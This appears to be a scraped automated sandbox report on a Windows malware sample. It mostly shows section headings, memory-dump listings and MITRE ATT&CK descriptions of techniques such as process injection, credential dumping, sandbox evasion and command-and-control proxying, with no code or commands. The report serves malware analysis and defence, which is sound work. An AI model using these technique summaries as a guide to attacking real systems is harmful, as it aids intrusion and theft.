Associated: 00000000.00000002.1590979501.00000000011B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1590979501.00000000011DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591053345.00000000011E2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591073711.00000000011F3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1591088802.00000000011F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bc0000_CFuejz2dRu.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19322aacc7dd447383d6f2170a10e82d5a65409c32a3e247da5a00b3a98942e9
Instruction ID: 506c462825eb3f50bda1613ab786ce36f48dcbfb439d008f86a0224117ff52b3
Opcode Fuzzy Hash: 19322aacc7dd447383d6f2170a10e82d5a65409c32a3e247da5a00b3a98942e9
Instruction Fuzzy Hash:

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers. Root certificates are used in public key cryptography to identify a root certificate authority (CA). When a root certificate is installed, the system or application will trust certificates in the root's chain of trust that have been signed by the root certificate.Certificates are commonly used for establishing secure TLS/SSL communications within a web browser. When a user attempts to browse a website that presents a certificate that is not trusted an error message will be displayed to warn the user of the security risk. Depending on the security settings, the browser may not allow the user to establish a connection to the website.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN , ZXProxy, and ZXPortMap. Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report CFuejz2dRu.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mhvjrwye.fn2.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q3hkxvbv.cjm.ps1

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

Windows Analysis Report
CFuejz2dRu.exe